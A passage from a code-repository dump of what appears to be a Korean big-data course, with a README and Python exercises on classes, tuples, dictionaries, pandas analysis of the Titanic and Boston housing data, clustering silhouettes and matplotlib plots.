]\n\ninfo =[{'empno':1, 'addr':'서울시','phone':'010-1111-1111'},\n\n {'empno':3, 'addr':'부산시','phone':'010-2222-2222'}, \n {'empno':2, 'addr':'광주시','phone':'010-3333-3333'}, \n {'empno':5, 'addr':'광주시','phone':'010-4444-4444'},\n {'empno':4, 'addr':'광주시','phone':'010-5555-5555'} ]\n================================= \n\n- grouby() 와 pivot_table() 예제 데이터셋\n\nfrom numpy.random import seed\n\nfrom numpy.random import rand\n\nfrom numpy.random import randint\n\nseed(42)\n\ndf = pd.DataFrame({\n 'Weather' : ['cold', 'hot', 'cold', 'hot',\n 'cold', 'hot', 'cold'],\n \n 'Food' : ['soup', 'soup', 'icecream', 'chocolate',\n 'icecream', 'icecream', 'soup'],\n \n 'Price' : 10 * rand(7), 'Number' : randint(1, 9, 7)})\n\n\n============================================================\n\n### 구글 colaboratory 사용법 : 무료 GPU 사용 (1회 12시간 이내)\n\nhttps://hiseon.me/data-analytics/google-colaboratory/\n\n\n============================================================\n"
},
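The README record above lists the employee, dept, and info example datasets for merge() but stops short of showing the join itself. A minimal sketch, assuming those three lists exactly as given, joins them on their shared keys:

```python
import pandas as pd

employee = [{'empno': 1, 'ename': 'kim', 'dept': 1},
            {'empno': 2, 'ename': 'lee', 'dept': 2},
            {'empno': 3, 'ename': 'park', 'dept': 1},
            {'empno': 4, 'ename': 'song', 'dept': 3},
            {'empno': 5, 'ename': 'min', 'dept': 2}]
dept = [{'dept': 1, 'deptname': '관리직'},
        {'dept': 2, 'deptname': '영업직'},
        {'dept': 3, 'deptname': '개발직'}]
info = [{'empno': 1, 'addr': '서울시', 'phone': '010-1111-1111'},
        {'empno': 3, 'addr': '부산시', 'phone': '010-2222-2222'},
        {'empno': 2, 'addr': '광주시', 'phone': '010-3333-3333'},
        {'empno': 5, 'addr': '광주시', 'phone': '010-4444-4444'},
        {'empno': 4, 'addr': '광주시', 'phone': '010-5555-5555'}]

# Join employees to department names on 'dept', then to contact info on 'empno'.
df = (pd.DataFrame(employee)
        .merge(pd.DataFrame(dept), on='dept')
        .merge(pd.DataFrame(info), on='empno'))
print(df)
```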
{
"alpha_fraction": 0.6266233921051025,
"alphanum_fraction": 0.6915584206581116,
"avg_line_length": 10.807692527770996,
"blob_id": "5440853e64231fe648a48a1f301e8a80455c064a",
"content_id": "e39228d9cceba5bd033b81b43bdf536403472145",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 364,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 26,
"path": "/README.MD",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "bigdata 전문가 과정\n\n강사: 고병화\n\nE-mail : [email protected]\n\n[강사 git주소 ]\n\nhttps://github.com/digicope01/bigdata\n\n\n\n\n[데이터 과학 경진대회 사이트 모음]\n\n\nhttps://theorydb.github.io/dev/2019/06/23/dev-competition-list/\n\n\nhttps://www.wevity.com/?c=find&s=1&gub=1&cidx=22\n\n\nhttps://compas.lh.or.kr/web/lhcF010101.do\n\n\nhttps://arena.kakao.com/\n\n"
},
{
"alpha_fraction": 0.5473484992980957,
"alphanum_fraction": 0.56144779920578,
"avg_line_length": 21.64179039001465,
"blob_id": "bad5e4f0b854138d9cdc9dc909754bce968de5f1",
"content_id": "b4af6f61d124430b66f17b7e3299ca65bc56e8b0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5494,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 201,
"path": "/파이썬프로그래밍/클래스기초실습문제.py",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "# 클래스기초실습문제.py\r\n# 1번\r\nclass Car:\r\n\r\n def __init__(self):\r\n print('생성자')\r\n self.car_name = '소나타'\r\n self.car_drv = '전륜'\r\n self.car_speed = 0\r\n self.car_direction = '앞쪽'\r\n self.car_fuel = '휘발유'\r\n self.car_state = '정상'\r\n\r\n def set_car_name(self, name):\r\n self.car_name = name\r\n print(\"차종이 [\",self.car_name,\"]으로 변경 되었습니다\")\r\n\r\n def get_car_name(self):\r\n return self.car_name\r\n\r\n def set_car_drv(self, drv):\r\n self.car_drv = drv\r\n print(\"차의 구동 방식이 [\", self.car_drv ,\"]으로 변경 되었습니다\")\r\n\r\n def get_car_drv(self):\r\n return self.car_drv\r\n\r\n def set_car_fuel(self, fuel):\r\n self.car_fuel = fuel\r\n print(\"차의 연료 방식이 [\", self.car_fuel,\"]로 변경 되었습니다\")\r\n\r\n def get_car_fuel(self):\r\n return self.car_fuel\r\n\r\n def set_car_state(self,state):\r\n self.car_state = state\r\n print(\"차의 상태가 [\",self.car_state, \"]으로 변경 되었습니다\")\r\n\r\n def get_car_state(self):\r\n return self.car_state\r\n\r\n def set_speed(self,speed):\r\n self.car_speed = speed\r\n print(\"자동차의 속력이 시속 [\",self.car_speed,\"]km 로 변경되었습니다\")\r\n\r\n def get_speed(self):\r\n return self.car_speed\r\n\r\n def turn(self,direction):\r\n self.car_direction = direction\r\n print(\"자동차의 방향이 [\",self.car_direction ,\"]으로 변경되었습니다\")\r\n\r\n def stop(self):\r\n self.car_direction = '정지'\r\n print(\"자동차가 정지 하였습니다\")\r\n\r\n def start(self):\r\n print(\"자동차가 시동이 걸렸습니다\")\r\n\r\n def move_forward(self):\r\n self.car_direction = '앞쪽'\r\n print(\"자동차가 전진합니다 속도는 \",self.car_speed,\"km입니다\")\r\n\r\n def move_backward(self):\r\n self.car_direction = '뒤쪽'\r\n print(\"자동차가 후진합니다 속도는 \",self.car_speed,\"km입니다\")\r\n\r\n def __del__(self):\r\n print('[', self.car_name, \"] 자동차가 제거되었습니다\")\r\n\r\n\r\ndef test_car_class():\r\n sonata = Car()\r\n sonata.set_car_name('산타페')\r\n print(sonata.get_car_name())\r\n\r\n sonata.set_car_drv('4륜')\r\n print(sonata.get_car_drv())\r\n\r\n sonata.set_car_fuel('전기')\r\n print(sonata.get_car_fuel())\r\n\r\n sonata.set_car_state('브레이크고장')\r\n print(sonata.get_car_state())\r\n\r\n sonata.set_speed(100)\r\n print(sonata.get_speed())\r\n\r\n sonata.turn('오른쪽')\r\n sonata.stop()\r\n\r\n sonata.start()\r\n\r\n sonata.move_forward()\r\n\r\n sonata.move_backward()\r\n\r\n return sonata\r\n\r\n# sonata = test_car_class()\r\n\r\n# print('-'*30)\r\n\r\n# 2번\r\n\r\nclass CarCenter:\r\n price = {'정상': 10, '브레이크고장': 1000, '전조등고장': 2000, '후미등고장': 3000, '연료부족': 4000,\r\n '타이어펑크': 5000, '엔진오일부족': 6000, '냉각수부족': 7000, '폐차처리': 9000}\r\n\r\n def __init__(self):\r\n self.fix_cost = 0\r\n self.fixed_list = {}\r\n # self.accent = Car()\r\n\r\n def fix_car(self,car):\r\n\r\n self.fix_cost = CarCenter.price[car.car_state]\r\n self.fixed_list[car.car_name] = car.car_state\r\n print('[',car.car_name,']의 [',car.car_state,\r\n '] 수리 완료, 비용은 [',self.fix_cost,'] 원 입니다')\r\n\r\n def set_car_drv(self,car, drv):\r\n car.car_drv = drv\r\n # self.accent.car_drv = drv\r\n print(\"차의 구동 방식이 [\", car.car_drv ,\"]으로 변경 되었습니다\")\r\n\r\n def get_car_drv(self,car):\r\n return car.car_drv\r\n\r\n def set_car_fuel(self,car,fuel):\r\n car.car_fuel = fuel\r\n print(\"차의 연료 방식이 [\", car.car_fuel,\"]로 변경 되었습니다\")\r\n\r\n def get_car_fuel(self,car):\r\n return car.car_fuel\r\n\r\n def get_fixed_list(self,car):\r\n fixed_item = self.fixed_list[car.car_name]\r\n cost = CarCenter.price[fixed_item]\r\n return '[' + fixed_item + '] : [' + str(cost) + ']원'\r\n\r\n def __del__(self):\r\n pass\r\n\r\ndef test_carcenter(car):\r\n sonata = car\r\n\r\n ct1 = CarCenter()\r\n\r\n ct1.fix_car(sonata)\r\n\r\n 
ct1.set_car_drv(sonata,'후륜')\r\n print(ct1.get_car_drv(sonata))\r\n\r\n ct1.set_car_fuel(sonata, '전기')\r\n print(ct1.get_car_fuel(sonata))\r\n\r\n print(ct1.get_fixed_list(sonata))\r\n\r\n\r\n# test_carcenter(sonata)\r\n\r\n# 별도의 파일로 작성한다\r\nimport 클래스기초실습문제 as car\r\n\r\navante = car.Car()\r\navante.set_car_name('아반테')\r\nprint(avante.get_car_name())\r\navante.set_car_state('전조등고장')\r\nprint(avante.car_state)\r\n\r\nprint('-'*30)\r\nct1 = car.CarCenter()\r\nct1.fix_car(avante)\r\nct1.set_car_drv(avante, '후륜')\r\nprint(ct1.get_car_drv(avante))\r\n\r\nct1.set_car_fuel(avante, '수소')\r\nprint(ct1.get_car_fuel(avante))\r\nprint(ct1.get_fixed_list(avante))\r\n\r\n\r\nsorento = car.Car()\r\nsorento.set_car_name('소렌토')\r\nsorento.set_car_state('타이어펑크')\r\nct1.fix_car(sorento)\r\nprint(ct1.get_fixed_list(sorento))\r\n\r\npride = car.Car()\r\npride.set_car_name('프라이드')\r\npride.set_car_state('엔진오일부족')\r\nct1.fix_car(pride)\r\nprint(ct1.get_fixed_list(pride))\r\n\r\npride.set_car_state('타이어펑크')\r\nct1.fix_car(pride)\r\nprint(ct1.get_fixed_list(pride))\r\n\r\nprint(ct1.fixed_list)\r\n# {'아반테': '전조등고장', '소렌토': '타이어펑크',\r\n# '프라이드': '엔진오일부족'}\r\n"
},
{
"alpha_fraction": 0.43283581733703613,
"alphanum_fraction": 0.48507463932037354,
"avg_line_length": 11.466666221618652,
"blob_id": "261760325a62efc37d081769ff247965e90da45e",
"content_id": "ab616d5cd10fe25e37c2f6a4f36ecde44c7c7bf4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 446,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 30,
"path": "/파이썬프로그래밍/튜플실습문제.py",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "# 튜플실습문제.py\r\n\r\na=('a1','a2','a3','a4')\r\n\r\nb=('b1','b2','b3','b4')\r\n\r\n# 1\r\nq, w, e, r = a # 언패킹\r\nprint(q,w,e,r)\r\n\r\n# 2\r\nc = a + b # + 연산\r\nprint(c)\r\n\r\n# 3\r\nprint(c[2]) # 인덱싱\r\n\r\n# 4\r\nprint(c[5:]) # 슬라이싱\r\n\r\n# 5\r\nprint(c[:3]) # 슬라이싱\r\n\r\n# 6\r\ndel a[3]\r\n# TypeError: 'tuple' object doesn't support item deletion\r\n\r\n#7\r\nc[4] = 'c1'\r\n# TypeError: 'tuple' object does not support item assignment"
},
{
"alpha_fraction": 0.5611068606376648,
"alphanum_fraction": 0.5857033133506775,
"avg_line_length": 24.5510196685791,
"blob_id": "a8518c86e964ae891ee1a80607fcc233061c02d1",
"content_id": "59dc68c0fcbaa387ee69d0f2b838039ad2cde9ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1341,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 49,
"path": "/파이썬데이터분석/titanic실습과제.py",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "# titanic실습과제.py\r\n\r\n# https://kaggle-kr.tistory.com/17\r\n\r\nimport pandas as pd\r\nimport seaborn as sb\r\ntitanic = sb.load_dataset('titanic')\r\n\r\n\r\n# 1.1\r\ntitanic.to_csv('titanic_new.csv',index=False)\r\nprint(titanic.mean())\r\n\r\n# 1.2\r\ntitanic_new = titanic.fillna(titanic.mean())\r\ntitanic_new.to_csv('titanic_new_no_nan.csv',index=False)\r\n\r\n# 1.3\r\n\r\nprint('survived:',titanic['survived'][titanic['survived']\r\n == 1].count())\r\nprint('not survived:',titanic['survived'][titanic['survived']\r\n ==0].count())\r\n# 1.4\r\nprint(titanic.pivot_table(\"survived\", \"class\",aggfunc='mean'))\r\n\r\n# 1.5\r\nprint(titanic.pivot_table(\"survived\", \"sex\",aggfunc='mean'))\r\n\r\n# 1.6\r\nprint(titanic.pivot_table(\"survived\", \"age\",aggfunc='mean'))\r\n\r\n# 1.7\r\nprint(titanic.pivot_table(\"survived\", \"sibsp\",aggfunc='mean'))\r\n\r\n# 1.8\r\nprint(titanic.pivot_table(\"fare\",\"pclass\",aggfunc='mean'))\r\n\r\n# 1.9\r\nnew_df = titanic.drop(['deck'], axis = 1)\r\nprint(new_df)\r\n\r\n# 1.10\r\nprint('-'*50) # age를 3등급으로 나누어 등급의 성별 생존률\r\ntitanic[\"age_class\"] = pd.qcut(titanic.age, 3,\r\n labels = [\"young\", \"midlle\", \"old\"])\r\nprint(titanic.pivot_table('survived', index=['sex',\r\n 'age_class'], aggfunc='mean', columns='pclass'))\r\nprint('-'*50)\r\n"
},
{
"alpha_fraction": 0.4310850501060486,
"alphanum_fraction": 0.46187683939933777,
"avg_line_length": 11.836734771728516,
"blob_id": "98316e7ff57e04ccf63e3a70425f25ef442c4dda",
"content_id": "594a22597595aa95d0975856c8878952cf9f9f12",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 824,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 49,
"path": "/파이썬프로그래밍/DICT사전실습문제.py",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "# DICT실습문제.py\r\n#\r\n\r\nsrp = {'가위':'보','바위':'가위','보':'바위'}\r\n\r\n# 1\r\nprint(list(srp.keys()))\r\n\r\n# 2\r\nprint(list(srp.values()))\r\n\r\n# 3\r\nprint(list(srp.items()))\r\n\r\n# 4\r\nprint(srp['가위'])\r\n\r\n# 5\r\n# 파이선 스타일 방식\r\na = [x for x,y in srp.items() if y == '바위']\r\nprint(a[0])\r\n\r\n# 전통적인 언어의 방식\r\nfor x,y in srp.items():\r\n if y == '바위':\r\n a = x\r\nprint('key =',a)\r\n\r\n# 6\r\nb = {'찌':'빠', '묵':'찌', '빠':'묵'}\r\nsrp.update(b)\r\nprint(srp)\r\n\r\n# 7\r\nprint('보자기' in srp)\r\n\r\n# 8\r\n\r\n# 파이선 스타일 방식\r\n#srp = {1: '보',2:'바위', 3:'가위', 4:'묵', 5:'찌', 6:\"빠\"}\r\nsrp2 = { y:x for x,y in srp.items() }\r\nprint(srp2)\r\n\r\n# 전통적인 언어의 방식\r\nsrp2 = {}\r\nfor x,y in srp.items():\r\n srp2.update({y:x})\r\n\r\nprint('srp2 =',srp2)\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5293377041816711,
"alphanum_fraction": 0.5575422048568726,
"avg_line_length": 23.04430389404297,
"blob_id": "6f3e6aefae2f73a50e8486eb1736141265db3281",
"content_id": "f25cf0bd4296b6cc8feba503d5b23237e61581f5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4119,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 158,
"path": "/파이썬데이터분석/pandas _housing_실습문제.py",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "# pandas _housing_실습문제.py\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\n# 1번\r\ndf = pd.read_csv('boston_train.csv')\r\n\r\nprint(\"Shape:\\n\", df.shape)\r\nprint(\"Length:\\n\", len(df))\r\nprint(\"Column Headers:\\n\", df.columns)\r\nprint(\"Data types:\\n\", df.dtypes)\r\nprint(\"Index:\\n\", df.index)\r\nprint(\"Values:\\n\", df.values)\r\nprint(\"head\",df.head())\r\nprint(\"teail\",df.tail())\r\nprint(\"Describe\", df.describe(),\"\\n\")\r\nprint(\"Non NaN observations\", df.count(),\"\\n\")\r\nprint(\"MAD\", df.mad(),\"\\n\")\r\nprint(\"Median\", df.median(),\"\\n\")\r\nprint(\"Mean\", df.mean(),\"\\n\")\r\nprint(\"Sum\", df.sum(),\"\\n\")\r\nprint(\"Min\", df.min(),\"\\n\")\r\nprint(\"Max\", df.max(),\"\\n\")\r\nprint(\"Mode\", df.mode(),\"\\n\")\r\nprint(\"Standard Deviation\", df.std(),\"\\n\")\r\nprint(\"Variance\", df.var(),\"\\n\")\r\nprint(\"Skewness\", df.skew(),\"\\n\")\r\nprint(\"Kurtosis\", df.kurt(),\"\\n\")\r\n\r\nprint('-'*50)\r\n\r\n\r\n# 2-1번\r\nprint('CRIM mean: ', df['CRIM'].mean())\r\nprint(df[df['CRIM'] > df['CRIM'].mean()])\r\n\r\nprint('-'*50)\r\n\r\n# 2-2번\r\nprint('AGE mean: ', df['AGE'].mean())\r\nprint(df[df['AGE'] < df['AGE'].mean()])\r\n\r\nprint('-'*50)\r\n\r\n# 2-3번\r\nprint('MEDV median: ', df['MEDV'].median())\r\nprint(df[df['MEDV'] < df['MEDV' ].median()])\r\n\r\nprint('-'*50)\r\n\r\n# 3번\r\n\r\ndf_train = pd.read_csv('boston_train.csv')\r\ndf_test = pd.read_csv('boston_test.csv')\r\n\r\n# df = pd.concat([df_train[:10],df_test[:10]],ignore_index=True)\r\ndf = df_train[:10].append(df_test[:10],ignore_index=True)\r\n\r\nprint(df)\r\n\r\ndf.to_csv('boston_batch.csv', index=False)\r\nprint('-'*50)\r\n\r\n# 4번\r\n\r\ndf = pd.read_csv('boston_train.csv')\r\n\r\n# print(pd.pivot_table(df,columns=['CRIM'], agg_func = np.sum))\r\n\r\nfor col in df.columns:\r\n# for col in df.columns[:]:\r\n print('[',col,']')\r\n print('sum :',df[col].sum())\r\n print('mean :',df[col].mean())\r\n print('median :',df[col].median())\r\n print('min :',df[col].min())\r\n print('max :',df[col].max())\r\n print('describe :', df[col].describe())\r\n\r\n# 5번\r\n\r\nsunspots = pd.read_csv(\"sunspots.csv\")\r\nprint(\"Total Null Values\\n\", pd.isnull(sunspots).sum())\r\nsunspots = sunspots.fillna(0)\r\nprint(sunspots)\r\nprint(\"Total Null Values\\n\", pd.isnull(sunspots).sum())\r\n\r\nsunspots.to_csv('sunspots_new.csv',float_format = '%.2f',\r\n na_rep='NaN',index=False)\r\n\r\n# 6번\r\nsunspots = pd.read_csv(\"sunspots.csv\")\r\nsunspots['Date'] = pd.to_datetime(sunspots['Date'])\r\nprint(sunspots.dtypes)\r\nprint('Mean:',pd.Series(sunspots['Date']).mean())\r\n\r\nsunspots = sunspots[sunspots['Date'] > sunspots['Date'].mean()]\r\n\r\nsunspots.to_csv('sunspots_new2.csv',float_format = '%.2f',\r\n na_rep='NaN',index=False)\r\nsunspots = pd.read_csv(\"sunspots_new2.csv\")\r\nprint(sunspots.dtypes)\r\n\r\nprint('-'*50)\r\n\r\n# 7번\r\ndf_A_B = pd.DataFrame({'판매월': ['1월', '2월', '3월', '4월'],\r\n '제품A': [100, 150, 200, 130],\r\n '제품B': [90, 110, 140, 170]})\r\nprint(df_A_B)\r\n\r\ndf_C_D = pd.DataFrame({'판매월': ['1월', '2월', '3월', '4월'],\r\n '제품C': [112, 141, 203, 134],\r\n '제품D': [90, 110, 140, 170]})\r\nprint(df_C_D)\r\n\r\nprint(df_A_B.merge(df_C_D,on='판매월'))\r\n\r\nprint('-'*50)\r\n\r\n# 8번\r\ndf_left = pd.DataFrame({'key':['A','B','C'],\r\n 'left': [1, 2, 3]})\r\nprint(df_left)\r\n\r\ndf_right = pd.DataFrame({'key':['A','B','D'],\r\n 'right': [4, 5, 6]})\r\nprint(df_right)\r\n\r\n# 8.1\r\nprint('\\ninner join:')\r\nprint(df_left.merge(df_right, how='inner', on = 
'key'))\r\n\r\n# 8.2\r\nprint('\\nouter join:')\r\nprint(df_left.merge(df_right, how='outer', on = 'key'))\r\n\r\n# 8.3\r\nprint('\\nleft join:')\r\nprint(df_left.merge(df_right, how='left', on = 'key'))\r\n\r\n# 8.4\r\nprint('\\nright join:')\r\nprint(df_left.merge(df_right, how='right', on = 'key'))\r\n\r\n\r\nprint('-'*50)\r\n\r\n\r\n# 9번\r\ndf = pd.read_csv('WHO_first9cols.csv')\r\nresult = df['Country'].str.contains(\"Albania\")\r\nprint(df['Country'][result]) # 요소값들로 출력\r\nprint(df[result]) # 데이터 프레임으로 출력\r\n\r\nresult = df['Country'].str.contains(\"Ethiopia\")\r\nprint(df['Country'][result]) # 요소값들로 출력\r\nprint(df[result]) # 데이터 프레임으로 출력\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5629723072052002,
"alphanum_fraction": 0.5789252519607544,
"avg_line_length": 43.846153259277344,
"blob_id": "c9569485edea93864bd84c3089ae9746c3bc55a8",
"content_id": "556f387c6775730cc2d246c4e84b16f61775f438",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2752,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 52,
"path": "/파이썬머신러닝/visualize_silhouette함수.py",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "### 여러개의 클러스터링 갯수를 List로 입력 받아 각각의 실루엣 계수를 면적으로 시각화한 함수 작성\r\ndef visualize_silhouette(cluster_lists, X_features): \r\n \r\n from sklearn.datasets import make_blobs\r\n from sklearn.cluster import KMeans\r\n from sklearn.metrics import silhouette_samples, silhouette_score\r\n\r\n import matplotlib.pyplot as plt\r\n import matplotlib.cm as cm\r\n import math\r\n \r\n # 입력값으로 클러스터링 갯수들을 리스트로 받아서, 각 갯수별로 클러스터링을 적용하고 실루엣 개수를 구함\r\n n_cols = len(cluster_lists)\r\n \r\n # plt.subplots()으로 리스트에 기재된 클러스터링 수만큼의 sub figures를 가지는 axs 생성 \r\n fig, axs = plt.subplots(figsize=(4*n_cols, 4), nrows=1, ncols=n_cols)\r\n \r\n # 리스트에 기재된 클러스터링 갯수들을 차례로 iteration 수행하면서 실루엣 개수 시각화\r\n for ind, n_cluster in enumerate(cluster_lists):\r\n \r\n # KMeans 클러스터링 수행하고, 실루엣 스코어와 개별 데이터의 실루엣 값 계산. \r\n clusterer = KMeans(n_clusters = n_cluster, max_iter=500, random_state=0)\r\n cluster_labels = clusterer.fit_predict(X_features)\r\n \r\n sil_avg = silhouette_score(X_features, cluster_labels)\r\n sil_values = silhouette_samples(X_features, cluster_labels)\r\n \r\n y_lower = 10\r\n axs[ind].set_title('Number of Cluster : '+ str(n_cluster)+'\\n' \\\r\n 'Silhouette Score :' + str(round(sil_avg,3)) )\r\n axs[ind].set_xlabel(\"The silhouette coefficient values\")\r\n axs[ind].set_ylabel(\"Cluster label\")\r\n axs[ind].set_xlim([-0.1, 1])\r\n axs[ind].set_ylim([0, len(X_features) + (n_cluster + 1) * 10])\r\n axs[ind].set_yticks([]) # Clear the yaxis labels / ticks\r\n axs[ind].set_xticks([0, 0.2, 0.4, 0.6, 0.8, 1])\r\n \r\n # 클러스터링 갯수별로 fill_betweenx( )형태의 막대 그래프 표현. \r\n for i in range(n_cluster):\r\n ith_cluster_sil_values = sil_values[cluster_labels==i]\r\n ith_cluster_sil_values.sort()\r\n \r\n size_cluster_i = ith_cluster_sil_values.shape[0]\r\n y_upper = y_lower + size_cluster_i\r\n \r\n color = cm.nipy_spectral(float(i) / n_cluster)\r\n axs[ind].fill_betweenx(np.arange(y_lower, y_upper), 0, ith_cluster_sil_values, \\\r\n facecolor=color, edgecolor=color, alpha=0.7)\r\n axs[ind].text(-0.05, y_lower + 0.5 * size_cluster_i, str(i))\r\n y_lower = y_upper + 10\r\n \r\n axs[ind].axvline(x=sil_avg, color=\"red\", linestyle=\"--\")"
},
{
"alpha_fraction": 0.6441473960876465,
"alphanum_fraction": 0.6697976589202881,
"avg_line_length": 17.22222137451172,
"blob_id": "b824f3bb3df2573803733bea3e9c1c2dc37ecc88",
"content_id": "7d95d07b282d915a14a96d8a2a3a398c884ea52a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2934,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 144,
"path": "/파이썬데이터분석/boston_전처리.py",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "# boston_전처리.py\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.preprocessing import MinMaxScaler\r\n\r\nimport matplotlib\r\nmatplotlib.rcParams['font.family'] = 'Malgun Gothic'\r\nmatplotlib.rcParams['axes.unicode_minus'] = False\r\n\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\n\r\ndf = pd.read_csv('boston_train.csv')\r\n# df = df.fillna(0)\r\n\r\n# 'CRIM' 원본\r\ncrime = df['CRIM'].values\r\nplt.subplot(221)\r\nplt.hist(crime)\r\nplt.title('CRIME 원본')\r\n# plt.show()\r\n\r\n# 'CRIM' 표준화\r\ncrime = crime.reshape(-1,1)\r\ncrime_std = StandardScaler().fit_transform(crime)\r\ncrime_std_zoomin = crime_std[crime_std < 2]\r\n\r\nplt.subplot(222)\r\nplt.hist(crime_std_zoomin)\r\nplt.title('CRIME 표준화')\r\n\r\n\r\n# 'CRIM' 정규화\r\ncrime_std_zoomin = crime_std_zoomin.reshape(-1,1)\r\ncrime_minmax = MinMaxScaler().fit_transform(crime_std_zoomin)\r\n\r\nplt.subplot(224)\r\nplt.hist(crime_minmax)\r\nplt.title('CRIME 정규화')\r\n\r\nplt.show()\r\n\r\n\r\n# 'ZN' 원본\r\nzn = df['ZN'].values\r\nplt.subplot(221)\r\nplt.hist(zn)\r\nplt.title('zn 원본')\r\n\r\n# 'ZN' 표준화\r\nzn = zn.reshape(-1,1)\r\nzn_std = StandardScaler().fit_transform(zn)\r\n# plt.boxplot(zn_std)\r\n# plt.show()\r\n# input()\r\nzn_std_zoomin = zn_std[zn_std < 1]\r\n\r\nplt.subplot(222)\r\nplt.hist(zn_std_zoomin)\r\nplt.title('ZN 표준화')\r\n\r\n\r\n# 'ZN' 정규화\r\nzn_std_zoomin = zn_std_zoomin.reshape(-1,1)\r\nzn_minmax = MinMaxScaler().fit_transform(zn_std_zoomin)\r\n\r\nplt.subplot(224)\r\nplt.hist(zn_minmax)\r\nplt.title('ZN 정규화')\r\n\r\nplt.show()\r\n\r\n# 'TAX' 원본\r\ntax = df['TAX'].values\r\nplt.subplot(221)\r\nplt.hist(tax)\r\nplt.title('TAX 원본')\r\n\r\n# 'TAX' 표준화\r\ntax = tax.reshape(-1,1)\r\ntax_std = StandardScaler().fit_transform(tax)\r\ntax_std_zoomin = tax_std[tax_std < 0.5]\r\n\r\nplt.subplot(222)\r\nplt.hist(tax_std_zoomin)\r\nplt.title('TAX 표준화')\r\n\r\n\r\n# 'TAX' 정규화\r\ntax_std_zoomin = tax_std_zoomin.reshape(-1,1)\r\ntax_minmax = MinMaxScaler().fit_transform(tax_std_zoomin)\r\n\r\nplt.subplot(224)\r\nplt.hist(tax_minmax)\r\nplt.title('TAX 정규화')\r\nplt.show()\r\n\r\n# 'MEDV' 원본\r\nmedv = df['MEDV'].values\r\nplt.subplot(221)\r\nplt.hist(medv)\r\nplt.title('MEDV 원본')\r\n\r\n# 'MEDV' 표준화\r\nmedv = medv.reshape(-1,1)\r\nmedv_std = StandardScaler().fit_transform(medv)\r\nmedv_std_zoomin = medv_std[medv_std < 1.8]\r\n\r\nplt.subplot(222)\r\nplt.hist(medv_std_zoomin)\r\nplt.title('MEDV 표준화')\r\n\r\n\r\n# 'MEDV' 정규화\r\nmedv_std_zoomin = medv_std_zoomin.reshape(-1,1)\r\nmedv_minmax = MinMaxScaler().fit_transform(medv_std_zoomin)\r\n\r\nplt.subplot(224)\r\nplt.hist(medv_minmax)\r\nplt.title('MEDV 정규화')\r\nplt.show()\r\n\r\n\r\n# 최종 결과\r\nplt.subplot(221)\r\nplt.hist(crime_minmax)\r\nplt.title('CRIM 정규화')\r\n\r\nplt.subplot(222)\r\nplt.hist(zn_minmax)\r\nplt.title('ZN 정규화')\r\n\r\nplt.subplot(223)\r\nplt.hist(tax_minmax)\r\nplt.title('TAX 정규화')\r\n\r\nplt.subplot(224)\r\nplt.hist(medv_minmax)\r\nplt.title('MEDV 정규화')\r\nplt.show()\r\n"
},
{
"alpha_fraction": 0.5975689888000488,
"alphanum_fraction": 0.6238502264022827,
"avg_line_length": 21.968503952026367,
"blob_id": "36aba5dd86afd890571bb5ca5c8285a55e783053",
"content_id": "724f87123eb95ce06bb9634777c2ea667ff7bccf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3114,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 127,
"path": "/파이썬데이터분석/matplotlib_실습문제.py",
"repo_name": "digicope01/bigdata",
"src_encoding": "UTF-8",
"text": "# matplotlib_실습문제.py\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nimport matplotlib\r\nmatplotlib.rcParams['font.family'] = 'Malgun Gothic'\r\nmatplotlib.rcParams['axes.unicode_minus'] = False\r\n\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\ndf = pd.read_csv('boston_train.csv')\r\n\r\n# 1.1번 로그플롯\r\ncrim = df['CRIM'].values\r\nmedv = df['MEDV'].values\r\n\r\npoly = np.polyfit(crim,np.log(medv),deg=1) # 학습\r\nprint(type(poly))\r\nprint('Poly',poly[0]) # W, 기울기\r\nprint('Poly',poly[1]) # b, y절편\r\n# plt.plot(crim,np.log(medv),'o')\r\n# plt.show()\r\nplt.semilogy(crim,medv,'o')\r\nplt.semilogy(crim,np.exp(np.polyval(poly,crim)))\r\nplt.title('1.1 Boston crim/zn medv scatter plot')\r\n\r\nplt.show()\r\nprint(df.corr())\r\n\r\n\r\n# 1.2번 분산 플롯\r\ncrim = df['CRIM'].values\r\nmedv = df['MEDV'].values\r\nzn = df['ZN'].values\r\n\r\n# c: color, s:size, 